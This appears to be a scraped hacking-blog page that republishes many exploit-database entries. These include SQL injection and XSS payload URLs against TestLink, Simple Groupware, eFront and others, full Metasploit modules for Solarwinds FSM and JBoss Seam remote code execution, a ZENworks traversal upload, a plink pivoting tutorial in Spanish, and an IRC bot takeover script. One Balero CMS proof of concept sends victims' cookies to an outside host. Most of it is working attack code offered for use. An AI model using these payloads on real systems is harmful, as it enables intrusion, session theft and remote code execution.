source: https://www.securityfocus.com/bid/52086/info
TestLink is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/lib/ajax/getrequirementnodes.php?root_node=1 OR 1=1
http://www.example.com/lib/ajax/gettprojectnodes.php?root_node=4 OR 1=1
http://www.example.com/lib/cfields/cfieldsEdit.php?do_action=edit&cfield_id=1 AND
3653=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/plan/planMilestonesEdit.php?doAction=edit&id=7
AND 5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/plan/planMilestonesEdit.php?doAction=create&tplan_id=2623
AND 5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/requirements/reqEdit.php?doAction=create&req_spec_id=2622
AND 5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/requirements/reqImport.php?req_spec_id=2622 AND
5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/requirements/reqSpecAnalyse.php?req_spec_id=2622
OR 1=1
http://www.example.com/lib/requirements/reqSpecPrint.php?req_spec_id=2622
AND 5912=BENCHMARK(5000000,MD5(1))
http://www.example.com/lib/requirements/reqSpecView.php?req_spec_id=2622 AND
5912=BENCHMARK(5000000,MD5(1))
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863535831
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/52085/info
F*EX is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
http://www.example.com/fup [id parameter]
http://www.example.com/fup [to parameter]
http://www.example.com/fup [from parameter]
source: https://www.securityfocus.com/bid/51882/info
Simple Groupware is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Simple Groupware 0.742 is vulnerable; other versions may also be affected.
http://www.example.com/SimpleGroupware_0.742/bin/index.php?export=<ScRiPt >alert('xss')</ScRiPt>
source: https://www.securityfocus.com/bid/51952/info
PHP is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users.
PHP 5.3.8 is vulnerable; other versions may also be affected.
<?php
// make a Pdo_Mysql statement before
$result = $stmt->fetch(PDO::FETCH_LAZY);
session_start();
$_SESSION['PDORow'] = $result;
?>
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability",
'Description' => %q{
This module exploits multiple vulnerabilities found in Solarwinds Firewall Security Manager
6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface
due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set
the 'username' attribute before authentication. The second problem is that the settings-new.jsp
file will only check the 'username' attribute before authorizing the 'uploadFile' action,
which can be exploited and allows the attacker to upload a fake xls host list file to the
server, and results in arbitrary code execution under the context of SYSTEM.
Depending on the installation, by default the Change Advisor web server is listening on port
48080 for an express install. Otherwise, this service may appear on port 8080.
Solarwinds has released a fix for this vulnerability as FSM-v6.6.5-HotFix1.zip. You may
download it from the module's References section.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod', # Original discovery
'mr_me <steventhomasseeley[at]gmail.com>', # https://twitter.com/ae0n_
'sinn3r' # Metasploit
],
'References' =>
[
['CVE', '2015-2284'],
['OSVDB', '81634'],
['ZDI', '15-107'],
['URL', 'http://downloads.solarwinds.com/solarwinds/Release/HotFix/FSM-v6.6.5-HotFix1.zip']
],
'DefaultOptions' =>
{
'RPORT' => 48080 # Could be 8080 too
},
'Platform' => 'win',
'Targets' =>
[
['Solarwinds Firewall Security Manager 6.6.5', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Mar 13 2015',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [ true, 'Base FMS directory path', '/'])
], self.class)
end
# Returns a checkcode that indicates whether the target is FSM or not
def check
res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'fsm', 'login.jsp'))
if res && res.body =~ /SolarWinds FSM Change Advisor/i
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
# Exploit/run command
def exploit
unless check == Exploit::CheckCode::Detected
fail_with(Failure::NotVulnerable, 'Target does not appear to be a Solarwinds Firewall Security Manager')
end
# Stage 1 of the attack
# 'admin' is there by default and you can't delete it
username = 'admin'
print_status("Auth bypass: Putting session value: username=#{username}")
sid = put_session_value(username)
print_status("Your SID is: #{sid}")
# Stage 2 of the attack
exe = generate_payload_exe(code: payload.encoded)
filename = "#{Rex::Text.rand_text_alpha(5)}.jsp"
# Because when we get a shell, we will be at:
# C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice
# So we have to adjust this filename in order to delete the file
register_files_for_cleanup("../plugins/com.lisletech.athena.http.servlets_1.2/jsp/#{filename}")
malicious_file = get_jsp_payload(exe, filename)
print_status("Uploading file: #{filename} (#{exe.length} bytes)")
upload_exec(sid, filename, malicious_file)
end
private
# Returns a write-stager
# I grabbed this from Juan's sonicwall_gms_uploaded.rb module
def jsp_drop_bin(bin_data, output_file)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
jspraw << %Q|int numbytes = data.length();\n|
jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
jspraw << %Q|{\n|
jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
jspraw << %Q| comb <<= 4;\n|
jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
jspraw << %Q|}\n|
jspraw << %Q|outputstream.write(bytes);\n|
jspraw << %Q|outputstream.close();\n|
jspraw << %Q|%>\n|
jspraw
end
# Returns JSP that executes stuff
# This is also from Juan's sonicwall_gms_uploaded.rb module
def jsp_execute_command(command)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|try {\n|
jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n|
jspraw << %Q|} catch (IOException ioe) { }\n|
jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
jspraw << %Q|%>\n|
jspraw
end
# Returns a JSP payload
def get_jsp_payload(exe, output_file)
jsp_drop_bin(exe, output_file) + jsp_execute_command(output_file)
end
# Creates an arbitrary username by abusing the server's unsafe use of session.putValue
def put_session_value(value)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fsm', 'userlogin.jsp'),
'method' => 'GET',
'vars_get' => { 'username' => value }
)
unless res
fail_with(Failure::Unknown, 'The connection timed out while setting the session value.')
end
get_sid(res)
end
# Returns the session ID
def get_sid(res)
cookies = res.get_cookies
sid = cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
sid
end
# Uploads a malicious file and then execute it
def upload_exec(sid, filename, malicious_file)
res = upload_file(sid, filename, malicious_file)
if !res
fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file.')
elsif res.body.include?('java.lang.NoClassDefFoundError')
print_status('Payload being treated as XLS, indicates a successful upload.')
else
print_status('Unsure of a successful upload.')
end
print_status('Attempting to execute the payload.')
exec_file(sid, filename)
end
# Uploads a malicious file
# By default, the file will be saved at the following location:
# C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\reports\tickets\
def upload_file(sid, filename, malicious_file)
# Put our payload in:
# C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\jsp\
filename = "../../jsp/#{filename}"
mime_data = Rex::MIME::Message.new
mime_data.add_part(malicious_file, 'application/vnd.ms-excel', nil, "name=\"file\"; filename=\"#{filename}\"")
mime_data.add_part('uploadFile', nil, nil, 'name="action"')
proto = ssl ? 'https' : 'http'
ref = "#{proto}://#{rhost}:#{rport}#{normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp')}"
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp'),
'method' => 'POST',
'vars_get' => { 'action' => 'uploadFile' },
'ctype' => "multipart/form-data; boundary=#{mime_data.bound}",
'data' => mime_data.to_s,
'cookie' => sid,
'headers' => { 'Referer' => ref }
)
end
# Executes the malicious file and get code execution
# We will be at this location:
# C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice
def exec_file(sid, filename)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fsm', filename)
)
end
# Overrides the original print_status so we make sure we print the rhost and port
def print_status(msg)
super("#{rhost}:#{rport} - #{msg}")
end
end
>> Remote code execution in Novell ZENworks Configuration Management 11.3.1
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 07/04/2015 / Last updated: 07/04/2015
>> Background on the affected product:
"Automate and accelerate your Windows 7 migration
Microsoft estimates that it can take more than 20 hours to migrate a
single machine to Windows 7. Novell ZENworks Configuration Management
is ready to dramatically accelerate and automate every aspect of your
Windows 7 migration efforts.
Boost user productivity
Use Novell ZENworks Configuration Management to make sure users always
have access to the resources they need regardless of where they work
or what devices they use.
Eliminate IT effort
Automatically enforce policies and dynamically manage resources with
identity-based management of users as well as devices.
Expand your freedom to choose
Manage the lifecycles of all your current and future assets, with full
support for Windows and Linux systems, Novell eDirectory, Active
Directory, and more.
Simplify deployment with virtual appliances
Slash deployment times with a convenient virtual appliance deployment option.
Enjoy a truly unified solution
Centralize the management of all your devices into a single, unified
and easy-to-use web-based ZENworks console—called ZENworks Control
Center."
This vulnerability is present in ZENworks Configuration Management
(ZCM) which is part of the ZENworks Suite.
A blast from the past? This is a similar vulnerability to ZDI-10-078 /
OSVDB-63412, but it abuses a different parameter of the same servlet.
However this time Novell:
- Did not bother issuing a security advisory to their customers.
- Did not credit me even though I did responsible disclosure.
- Refused to provide a CVE number for months.
- Did not update their ZENworks Suite Trial software with the fix (you
can download it now from their site, install and test the PoC /
Metasploit module).
- Does not list the fix in the ZCM 11.3.2 update information
(https://www.novell.com/support/kb/doc.php?id=7015776).
>> Technical details:
Vulnerability: Remote code execution via file upload and directory traversal
CVE-2015-0779
Constraints: none; no authentication or any other information needed
Affected versions: ZENworks Configuration Management 11.3.1 and below
POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks/share/tomcat/webapps/&filename=payload.war
<WAR file payload in the body>
The WAR file will be automatically deployed to the server (on certain
Windows and Linux installations the path can be "../webapps/"). A
Metasploit module that exploits this vulnerability has been released.
>> Fix:
Upgrade to version ZENworks Configuration Management 11.3.2.
[1]: https://github.com/pedrib/PoC/blob/master/generic/zenworks_zcm_rce.txt
[2]: https://github.com/rapid7/metasploit-framework/pull/5096
Plink.exe es la versión para línea de comandos de PuTTY SSH Client. En los Windows más recientes, ya hay un cliente SSH incorporado por lo que no es muy útil plink, sin embargo, sí que lo es para los sistemas más antiguos los cuales no tienen este cliente SSH.
Podemos encontrar el binario de plink normalmente en la ruta:
/usr/share/windows-resources/binaries/plink.exe
Si no, se puede descargar desde la web oficial de putty.
Siendo plink.exe un cliente SSH, lo único que podemos hacer es un Remote Port Forwarding. En el post de SSH ya se comentó el peligro que tiene esto, básicamente de esta forma estás escribiendo las credenciales de tu equipo en una máquina que no es tuya, por lo que hay que tener cuidado (también se puede hacer uso de claves asimétricas).
El comando para usar plink.exe es el siguiente:
cmd.exe /c echo y | plink.exe -l <usuario> -pw <contraseña> <ip mia de atacante> -R <puerto que abrimos en mi maquina atacante>:<host de quien queremos tunelizar>:<puerto que queremos tunelizar>
Transferiríamos plink a la máquina Windows y ejecutaríamos el comando desde ahí.
La primera parte del comando: cmd.exe /c echo y, sirve para en las shells no interactivas (como es la mayoría de reverse shells en sistemas Windows), poder aceptar el mensaje de precaución que lanza plink por defecto.
Por lo demás, el resto del comando se entiende fácil si ya se ha tocado Remote Port Forwarding, si no, recomiendo visitar el post de Pivoting con SSH.
Además de esto, algunos parámetros útiles que podemos agregar en plink son los siguientes:
-g–> permite que otros clientes de la LAN puedan conectarse al puerto que se abre en la máquina atacante. Por defecto solo se puede en local.-f–> plink se va al segundo plano una vez se ha establecido la sesión SSH de forma exitosa.-N–> indicamos que no ejecute una shell, simplemente que se conecte (esto no significa que el proceso se mande al segundo plano), es decir, quedaría así:
Es bastante recomendable usar los parámetros -f y -N.
-i –> permite indicar una clave privada. Sin embargo, hay que hacer una conversión, ya que plink no va a entender el formato por defecto que nos deja ssh-keygen. Una vez tenemos generada la clave privada con ssh-keygen, seguimos los siguientes pasos:
Instalamos las tools de putty:
sudo apt install putty-tools
Una vez instaladas, hacemos uso de puttygen:
puttygen <clave privada> -o <nueva clave privada>.ppk
De esta forma, esta nueva clave privada que tenemos si la entenderá plink y podremos usarla.
Con todo esto explicado, vamos a hacer una prueba en el siguiente laboratorio:
- 3 Equipos
- Kali
- IP: 192.168.10.10
- Windows 7
- IP: 192.168.10.40 y 192.168.20.40 –> 2 Interfaces de Red
- Debian –> Servidor Web y SSH – Puerto 22 y 80 activados
- IP: 192.168.20.20
- Kali
OJO: de cara al Remote Port Forwarding, recomiendo hacer un cambio simple de contraseña en el passwd.
Para quien no conozca esto, básicamente puedes generar una contraseña en DES UNIX con openssl:
Si cogemos esta contraseña generada y la sustituimos en el passwd por la «x«, la contraseña del usuario será la que hemos puesto en openssl, en este caso «hola«, cuando se quiera volver a la contraseña anterior simplemente en el passwd se quita lo escrito y se vuelve a poner la «x«.
Con esto hecho, nos dirigimos al Windows y usamos plink como se indicaba en el comando escrito previamente:
cmd.exe /c echo y | plink.exe -l <usuario> -pw <contraseña> <ip mia de atacante> -R <puerto que abrimos en mi maquina atacante>:<host de quien queremos tunelizar>:<puerto que queremos tunelizar>
Si nos fijamos hay dos puntos importantes aquí:
- Podemos tunelizar tantos puertos como queramos, siempre usando el parámetro
-R. - Al tunelizar un puerto SSH, tenemos que indicarle otro puerto a utilizar/abrir en nuestra máquina que no sea el 22, ya que este ya se está empleando.
De esta forma, ya tenemos ambos puertos tunelizados, en este caso el 22 (el 2222 en nuestra máquina) y el 80:
Plink es una herramienta que poco a poco se irá quedando en desuso por la implementación por defecto del cliente SSH en los sistemas Windows. Sin embargo, en ciertas ocasiones donde estemos lidiando con algún que otro sistema antiguo, nos puede venir bastante bien.
# Exploit Title: Wordpress plugin 'Traffic Analyzer' Blind SQL Injection
# Google Dork: inurl:/plugins/trafficanalyzer/js/
# Date: 4/7/2015
# Exploit Author: Dan King (@fuzztester)
# Vendor Homepage: http://wptrafficanalyzer.in/
# Software Link: https://wordpress.org/plugins/trafficanalyzer/
# Version: 3.4.2
# Tested on: Ubuntu 14.10 with Mysql and Wordpress 4.11
[+] Issue [+]
The Wordpress plugin "Traffic Analyzer" is vulnerable to a blind SQL injection vulnerability. The application does not properly validate input from the "Referer" HTTP header value.
[+] Impact [+]
This vulnerability would allow a remote attacker to access the database with the privleges configured by Wordpress. This could also lead to the attack gaining remote access to the webservers filesystem and further compromise the system hosting the Wordpress installation.
[+] Details [+]
The following section of PHP code is where the vulnerability exists. The $sql variable is a concatenated string intended on being used to insert data into the database. The the variable $referer is not checked for malicious data.
From 'class-TrafficAnalyzer.php' line number 297:
######################################################################################
$sql = " insert into $wpdb->prefix"."tanalyzer_pre ( hid,ip, script_name, user_agent, request_uri,resource_type,browser,resource,http_referer,wpta_cookie ) values ".
" ('".$hid."'," .
" '".$_SERVER["REMOTE_ADDR"]."', ".
"'".$_SERVER['SCRIPT_NAME']."', " .
" '".$_SERVER["HTTP_USER_AGENT"]."', ".
" '". $_SERVER['REQUEST_URI']. "', ".
" '".$resource_type."', " .
" '".$browser."', " .
" '".$resource ."', " .
" '".$referer . "', " .
" '".$this->wpta_cookie . "'" .
" )";
###########################################################################################
[+] Proof of Concept [+]
Sending the following HTTP request to a vulnerable site will cause the request to be delayed for 30 seconds.
GET /[wordpress path]/ HTTP/1.1
Host: x.x.x.x
Referer: BLAH'||(SELECT 'Fdsf' FROM DUAL WHERE 5435=5435 and SLEEP(30) )||'
Balero CMS v0.7.2 Multiple Blind SQL Injection Vulnerabilities
Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2
Summary: Balero CMS is an open source project that can help you manage
the page of your company with just a few guided steps, minimizing the
costs that many companies make to have your advertising medium and/or
portal.
Desc: The application suffers from multiple blind SQL injection vulnerabilities
when input is passed to several POST parameters thru their affected modules
which are not properly sanitised before being returned to the user or used
in SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
Vulnerable POST parameters in affected modules:
-----------------------------------------------
- pages [admin]
- themes [admin]
- code [mod-languages]
- id [mod-blog, mod-virtual_page]
- title [mod-blog]
- a [mod-virtual_page]
- virtual_title [mod-virtual_page]
-----------------------------------------------
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5238
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5238.php
04.03.2015
--
csrf+bsqli poc:
<html>
<body>
<form action="http://localhost/balerocms/admin/edit_page/mod-virtual_page/id-11" method="POST">
<input type="hidden" name="virtual_title" value="ZSL" />
<input type="hidden" name="a" value="1" />
<input type="hidden" name="content" value="Testingus" />
<input type="hidden" name="_wysihtml5_mode" value="1" />
<input type="hidden" name="id" value="11' and benchmark (50000000,sha1(1))-- " />
<input type="hidden" name="submit_delete" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
<!--
Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities
Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2
Summary: Balero CMS is an open source project that can help you manage
the page of your company with just a few guided steps, minimizing the
costs that many companies make to have your advertising medium and/or
portal.
Desc: Input passed to the 'content' POST parameter and the cookie 'counter'
is not properly sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in context of an affected site.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5239
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5239.php
04.03.2015
-->
<html>
<body>
<script>
document.cookie="counter=1<script>confirm('XSS')</script>; path=/balerocms/";
</script>
</body>
</html>
csrf+stored xss+filter bypass+session hijack:
<html>
<body>
<form action="http://localhost/balerocms/admin/edit_delete_post/mod-blog" method="POST">
<input type="hidden" name="title" value="ZSL" />
<input type="hidden" name="content" value="pwned</textarea><s\cript>document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;</s\cript>" />
<input type="hidden" name="files" value="joxy.poxy" />
<input type="hidden" name="delete_post[]" value="135" />
<input type="hidden" name="id" value="135" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
# Exploit Title: Shareaholic 7.6.0.3 XSS
# Date: 10-11-2014
# Software Link: https://wordpress.org/plugins/shareaholic/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9311
# Category: webapps
1. Description
ShareaholicAdmin::add_location is accessible for every registered user.
File: shareaholic\shareaholic.php
add_action('wp_ajax_shareaholic_add_location', array('ShareaholicAdmin', 'add_location'));
$_POST['location'] is not escaped.
File: shareaholic\admin.php
public static function add_location() {
$location = $_POST['location'];
$app_name = $location['app_name'];
ShareaholicUtilities::update_options(array(
'location_name_ids' => array(
$app_name => array(
$location['name'] => $location['id']
),
),
$app_name => array(
$location['name'] => 'on'
)
));
echo json_encode(array(
'status' => "successfully created a new {$location['app_name']} location",
'id' => $location['id']
));
die();
}
http://security.szurek.pl/shareaholic-7603-xss.html
2. Proof of Concept
Login as regular user (created using wp-login.php?action=register) then:
<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="shareaholic_add_location">
<input type="hidden" name="location[app_name]" value="recommendations">
<input type="hidden" name="location[name]" value="post_below_content">
XSS: <input type="text" name="location[id]" value="'><script>alert(String.fromCharCode(88,83,83));</script>">
<input type="submit" value="Hack!">
</form>
XSS will be visible for admin:
http://wordpress-install/wp-admin/admin.php?page=shareaholic-settings
3. Solution:
Update to version 7.6.1.0
https://downloads.wordpress.org/plugin/shareaholic.7.6.1.0.zip
https://blog.shareaholic.com/security-update-shareaholic-wordpress-plugin/
######################
# Exploit Title : WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
# Software Link : https://mega.co.nz/#!DJAEBLBS!IBiukGo-pirelHmsRV80xZDHIvpqZKtTIqsD8YrMf7U
# Date : 2015-04-05
# Tested on : Linux / Mozilla Firefox
######################
# Description
WordPress All In One WP Security & Firewall 3.9.0 suffers from Blind SQL Injection vulnerability
There are some pages with wordpress esc_sql function.
esc_sql is prone to Blind SQL Injection (discovered by Ryan Dewhurst - http://dewhurstsecurity.com/)
isset($_GET["orderby"]) ? $orderby = strip_tags($_GET["orderby"]): $orderby = '';
isset($_GET["order"]) ? $order = strip_tags($_GET["order"]): $order = '';
- admin/wp-security-list-404.php
$orderby = !empty($orderby) ? esc_sql($orderby) : 'id';
$order = !empty($order) ? esc_sql($order) : 'DESC';
...
...
$data = $wpdb->get_results("SELECT * FROM $events_table_name ORDER BY $orderby $order", ARRAY_A);
- admin/wp-security-list-login-fails.php
$orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date';
$order = !empty($order) ? esc_sql($order) : 'DESC';
$data = $wpdb->get_results("SELECT * FROM $failed_logins_table_name ORDER BY $orderby $order", ARRAY_A);
- admin/wp-security-list-acct-activity-php
$orderby = !empty($orderby) ? esc_sql($orderby) : 'login_date';
$order = !empty($order) ? esc_sql($order) : 'DESC';
$data = $wpdb->get_results("SELECT * FROM $login_activity_table ORDER BY $orderby $order LIMIT 50", ARRAY_A)
- admin/wp-security-list-locked-ip.php
$orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date';
$order = !empty($order) ? esc_sql($order) : 'DESC';
$data = $wpdb->get_results("SELECT * FROM $lockdown_table_name WHERE release_date > now() ORDER BY $orderby $order", ARRAY_A)
######################
# PoC
http://VICTIM//wp-admin/admin.php?page=aiowpsec&tab=tab3&orderby=user_id,(select * from (select(sleep(30)))a)&order=asc
######################
# Vulnerability Disclosure Timeline:
2015-04-05: Discovered vulnerability
2015-04-06: Vendor Notification
2015-04-06: Vendor Response/Feedback
2015-04-07: Vendor Send Fix/Patch (3.9.1)
2015-04-07: Public Disclosure
#######################
Discovered By : Claudio Viviani
http://www.homelab.it
http://ffhd.homelab.it (Free Fuzzy Hashes Database)
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################
source: https://www.securityfocus.com/bid/51918/info
D-Link ShareCenter products are prone to multiple remote code-execution vulnerabilities.
Successful exploits will result in the execution of arbitrary code in the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.
The following products are affected:
D-Link DNS-320 ShareCenter
D-Link DNS-325 ShareCenter
http://www.example.com/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=ls
http://www.example.com/cgi-bin/discovery.cgi
http://www.example.com/cgi-bin/system_mgr.cgi?cmd=get_firm_v_xml
source: https://www.securityfocus.com/bid/51917/info
Apache APR is prone to a denial-of-service vulnerability.
An attacker can exploit this issue by sending specially crafted forms in HTTP POST requests.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36669.zip
source: https://www.securityfocus.com/bid/51894/info
eFront is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
eFront 3.6.10 is vulnerable; other versions may also be affected.
http://www.example.com/communityplusplus/www/administrator.php?ctg=languages&ajax=languagesTable&
limit=200&offset=0&sort=active&order=asc&other=&filter=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22VulnerabilityLab%22%29%20%3C
source: https://www.securityfocus.com/bid/51893/info
ManageEngine ADManager Plus is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ManageEngine ADManager Plus 5.2 Build 5210 is vulnerable; prior versions may also be affected.
#1 - GET http://www.example.com/jsp/AddDC.jsp?domainName="><script>alert('zsl')</script> HTTP/1.1
source: https://www.securityfocus.com/bid/51893/info
ManageEngine ADManager Plus is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ManageEngine ADManager Plus 5.2 Build 5210 is vulnerable; prior versions may also be affected.
#2 - POST http://www.example.com/DomainConfig.do?methodToCall=save HTTP/1.1 - DOMAIN_NAME=test&DOMAIN_CONTROLLER_NAME=testsrv&save=Add&operation="><script>alert('zsl')</script>&reset=
source: https://www.securityfocus.com/bid/51878/info
Vespa is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
Vespa 0.8.6 is vulnerable; other versions may also be affected.
http://www.example.com/[ Path ]/getid3/getid3.php?include=[LFI]%00
# thehunter.py
# Exploit Title: Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution
# Author: Jay Turla ( @shipcod3 )
# Description: pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution.
import socket
import sys
def usage():
print("USAGE: python thehunter.py nick \n")
def main(argv):
if len(argv) < 2:
return usage()
#irc server connection settings
botnick = sys.argv[1] #admin payload for taking over the w3wt0rk bot
server = "us.dal.net" #irc server
channel = "#buhaypirata" #channel where the bot is located
irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket
print "connecting to:"+server
irc.connect((server, 6667)) #connects to the server
irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :I eat w3tw0rk bots!\n") #user authentication
irc.send("NICK "+ botnick +"\n") #sets nick
irc.send("JOIN "+ channel +"\n") #join the chan
irc.send("PRIVMSG "+channel+" :!bot @system 'uname -a' \n") #send the payload to the bot
while 1: #puts it in a loop
text=irc.recv(2040) #receive the text
print text #print text to console
if text.find('PING') != -1: #check if 'PING' is found
irc.send('PONG ' + text.split() [1] + '\r\n') #returnes 'PONG' back to the server (prevents pinging out!)
if text.find('!quit') != -1: #quit the Bot
irc.send ("QUIT\r\n")
sys.exit()
if text.find('Linux') != -1:
irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n")
irc.send ("QUIT\r\n")
sys.exit()
if __name__ == "__main__":
main(sys.argv)
source: https://www.securityfocus.com/bid/51793/info
phpLDAPadmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
phpLDAPadmin 1.2.2 is affected; other versions may also be vulnerable.
http://www.example.com/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&scope=sub&
filter=objectClass%3D* display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search
#
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss Seam 2 File Upload and Execute',
'Description' => %q{
Versions of the JBoss Seam 2 framework < 2.2.1CR2 fails to properly
sanitize inputs to some JBoss Expression Language expressions. As a
result, attackers can gain remote code execution through the
application server. This module leverages RCE to upload and execute
a meterpreter payload.
Versions of the JBoss AS admin-console are known to be vulnerable to
this exploit, without requiring authentication. Tested against
